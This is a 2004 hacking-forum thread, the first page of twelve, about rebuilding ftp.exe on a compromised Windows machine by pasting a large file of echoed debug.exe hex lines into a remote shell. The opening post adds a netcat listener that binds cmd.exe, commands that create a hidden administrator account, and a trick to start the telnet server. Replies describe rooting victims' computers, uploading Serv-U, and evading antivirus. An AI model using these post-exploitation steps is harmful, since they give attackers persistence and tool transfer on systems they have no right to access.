Forums: Nasty Method, @echo This Txt To Create Ftp.exe - Forums

Jump to content

  • (12 Pages)
  • +
  • 1
  • 2
  • 3
  • Last »
  • You cannot start a new topic
  • You cannot reply to this topic

Nasty Method, @echo This Txt To Create Ftp.exe the power of exe to bat

#1 Guest_101_*

  • Group: Guests

Posted 13 March 2004 - 11:56 PM

//EDIT: see page 8, better ftp.txt posted.

I recommend to use a tool like SecureCRT, SSH1-2, Telnet Client (faster to copy/past the huge .txt)
Copy paste all into securecrt, it creates ftp.bat, then run ftp.bat , it will create ftp.exe.
Nb: I packed ftp.exe to make the debugging smaller.
See page 2 to dl ftp.bat to test locally if you are too lazy to mod the txt.
Of course for the guys who dunno , ftp.exe here is an example , you can update to another executable.

the .txt is also attached to the thread at the bottom.
Tested on 9x/XP

//EDIT: 2k was bugging, sorry my mistake, fixed version see page 8.

njoy this example ;P

ECHO @ECHO OFF^>1>ftp.bat
ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat
ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>

etc.. etc ... 1096 lines .. to big for the threads .. look at the attached file


NOW SOME SMALL TIPS

TIP1: Thats easy to use SecureCRT in binding mode , you just have to connect with a telnet method the port, then copy past all the txt at 1 time.
But in listening ?

your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p

TIP2:
You are on a system/admin rights shell without the possibility to copy paste the .txt ?

create a user

net user USER PASS /add
net localgroup Administrators USER /add

type tlntsvr.exe , try to connect to the ip port 23 with SecureCRT, it will refuse.
type a second time tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, telnet server is now started without to be enabled.(yes I tested it succesfully)

login with your created USER/PASS.
Your are know under a shell with Telnet & SecureCRT thats a big step.

But because you use telnet, you 'll have to copy past the lines 10 per 10.
(I tested , it's not so long , and working)

I had finally a ftp.exe created with the help of a really bad shell at start.

***************

If you can't make it working nm , me i successfully used it on everybox where
ftp/tftp were missing. You need of course some resources in your brain to find a way to copy paste the huge txt in all situations.

I hope my resources helped you , bye ;)

Attached File(s)

  • Attached File  ftp.txt (112.74K)
    Number of downloads: 2800

0

#2 User is offline   sylver 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 60
  • Joined: 16-January 04

Posted 14 March 2004 - 12:29 AM

cool what a nice method :rolleyes: :rolleyes:
0

#3 User is offline   stonebreaker 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 98
  • Joined: 25-February 04

Posted 14 March 2004 - 12:55 AM

wonderful
thanks for share it
0

#4 User is offline   archiv 

  • Private
  • Icon
  • Group: Members
  • Posts: 6
  • Joined: 27-February 04

Posted 14 March 2004 - 01:01 AM

nice method thx ....
but where can me dl the tool for faster copy/past ?! :P

thx
0

#5 User is offline   eXist 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 110
  • Joined: 30-December 03

Posted 14 March 2004 - 01:28 AM

Finding it on google isn't hard:
hxxp://www.vandyke.com/products/securecrt/index.html
Seek and you shall find what you're after.

Interesting method 101, not sure how practical it would be, interesting none the less.
0

#6 Guest_Zyne_*

  • Group: Guests

Posted 14 March 2004 - 02:17 AM

This definitely seems like a nice "util"...

I'm gonna give it a test on my own machine, just to see what it does exactly... :)



Thanks a lot for putting thit together, and sharing this with us m8!



Zyne
0

#7 User is offline   temptation 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 80
  • Joined: 30-November 03

Posted 14 March 2004 - 02:56 AM

Hi, thx for this, but i dunno how it works ...
I tried to rename the ftp.txt to ftp1.bat und executed it but it was not workin .. an idea?

[EDIT]
Ok, now it is workin, sry i was 2 dumb 4 it :/
0

#8 User is offline   BuzzDee 

  • Master Sergeant
  • Icon
  • Group: Specialist
  • Posts: 454
  • Joined: 27-September 03

Posted 14 March 2004 - 03:04 AM

yes this method is nice!

i'm using it quite long now :)

but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp ;)

that way u never have probs with uploading the files :D

greetz
0

#9 User is offline   EzMe 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 139
  • Joined: 03-March 04

Posted 14 March 2004 - 03:23 AM

Whow! Never thought this was possible.. Kewl gonna try it :)
0

#10 Guest_Lovellz_*

  • Group: Guests

Posted 14 March 2004 - 03:44 AM

Thanks alot for this class101.

annoying when u root a puter and they removed ftp.exe ;)

thanks alot matey :D
0

#11 User is offline   boshcash 

  • Master Sergeant
  • Icon
  • Group: Specialist
  • Posts: 461
  • Joined: 09-October 03

Posted 14 March 2004 - 04:10 AM

wow nice way man , its a bit complicated but its the best and i think this wont be ever detected by AVs
0

#12 User is offline   xzbit 

  • Private
  • Icon
  • Group: Members
  • Posts: 1
  • Joined: 08-March 04

Posted 14 March 2004 - 04:35 AM

big THX 101
for sharing this :)
0

#13 User is offline   TwitcH 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 40
  • Joined: 19-February 04

Posted 14 March 2004 - 04:56 AM

Methinks this could be useful.....
0

#14 User is offline   ZoraX 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 149
  • Joined: 28-February 04

Posted 14 March 2004 - 05:19 AM

thnx :D nice util:D
anybody tested that the ftp.exe works?
0

#15 Guest_xDD_*

  • Group: Guests

Posted 14 March 2004 - 05:36 AM

C:\WINNT\>ftp.exe
ftp.exe


C:\WINNT\>

hmmm


WOrk u ? : |
0

  • (12 Pages)
  • +
  • 1
  • 2
  • 3
  • Last »
  • You cannot start a new topic
  • You cannot reply to this topic

2 User(s) are reading this topic
0 members, 2 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting